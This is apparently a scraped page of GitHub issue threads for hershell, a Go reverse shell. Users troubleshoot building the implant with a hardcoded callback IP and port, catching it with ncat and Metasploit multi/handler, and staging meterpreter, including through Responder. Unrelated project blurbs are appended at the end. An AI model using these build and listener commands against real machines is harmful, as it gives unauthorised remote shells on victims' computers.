sysdream / hershell Goto Github PK
View Code? Open in Web Editor NEWHershell is a simple TCP reverse shell written in Go.
Hershell is a simple TCP reverse shell written in Go.
Hi there,
thanks for the really cool project. Are there any options or plans to make this work through http proxies?
I was searching for some kind of "powershell like" automation for retrieving credentials and proxy settings for outbound connections in go for a while without success, but at least a static proxy will possible for hershell.
All the best,
F
Hi,
I just followed the instructions mentioned in the README and compiled a binary by building it through "go". The binary is generated but running it does not send any request to the server while server is listening on some ip:port.
Hi there,
thanks for the really cool project. i just try this awesome tools, but i got some issue here.
can't get meterpreter work, only get
[hershell]> NCAT DEBUG: SSL_read error on 5: error:00000005:lib(0):func(0):DH lib
root@kali:~/hershell# ls
Dockerfile hershell.go LICENSE Makefile meterpreter README.md shell
root@kali:~/hershell# make depends
openssl req -subj '/CN=acme.com/O=ACME/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a RSA private key
......................................................................................................++++
..................++++
writing new private key to 'server.key'
cat server.key >> server.pem
root@kali:~/hershell# make windows64 LHOST=192.168.136.129 LPORT=6666
GOOS=windows GOARCH=amd64 go build --ldflags "-s -w -X main.connectString=192.168.136.129:6666 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout -in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go
root@kali:~/hershell# ls
Dockerfile hershell.go Makefile README.md server.pem
hershell.exe LICENSE meterpreter server.key shell
root@kali:~/hershell# ncat --ssl-cert server.pem --ssl-key server.key -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 192.168.136.1.
Ncat: Connection from 192.168.136.1:11382.
[hershell]> meterpreter https 192.168.136.129:9999
[hershell]> NCAT DEBUG: SSL_read error on 5: error:00000005:lib(0):func(0):DH lib
root@kali:~/hershell#
Msf cannot create a session when using meterpreter staging
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 192.168.136.129
lhost => 192.168.136.129
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > set HandlerSSLCert ./hershell/server.pem
HandlerSSLCert => ./hershell/server.pem
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://192.168.136.129:9999
When using windows/x64/meterpreter/reverse_https payload, even if hershell uses the merterpreter command, msf still keeps listening, and hershell outputs an error [hershell]> NCAT DEBUG: SSL_read error on 5: error:00000005:lib(0):func(0):DH lib
Hi,
I followed the instructions and successfully created ssl certificate-key and built payload (make macos ...) on my ubuntu server. I transferred the file to my mac and executed it. However, ubuntu does not catch anything. Tried both with openssl and ncat.
What should I modify in the code to automatically spawn a Meterpreter shell? For example if you use responder to launch the executable, only the first computer will be able to spawn a shell. That's why I want to let it spawn immediately to Meterrpreter.
I was thinking to put the following line in the source code (in the main code):
meterpreter.Meterpreter(transport, address)
But it doesn't seem to work.
Also if I try:
meterpreter.Meterpreter("https", "192.168.1.2")
Any idea what I do wrong?
The examples displayed in the README are outdated, and need to be updated.
Some examples about the meterpreter staging feature could also help.
Finaly, a troubleshooting section could be helpful.
hi,
i just try this awesome tools, but i got some issue here.
can't get meterpreter work, only get EOF in the [hershell], no reverse shell got
victim machine: win10 x64
attack machine: kali x64 rolling
msf exploit(handler) > run
[*] Exploit running as background job 6.
[*] Started reverse SSL handler on 192.168.123.42:4444
msf exploit(handler) > get exitonsession
exitonsession => false
msf exploit(handler) > get handlersslcert
handlersslcert => /home/cc/Desktop/tools/hershell/server.pem
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (python/shell_reverse_tcp_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.123.42 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) >
[hershell]> meterpreter 192.168.123.42:4444
EOF
[hershell]>
I am wondering if anyone else has had this error and if so what I might be able to do to fix it:
'GOOS' is not recognized as an internal or external command,
operable program or batch file.
make: *** [windows64] Error 1
So far I have done the following:
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.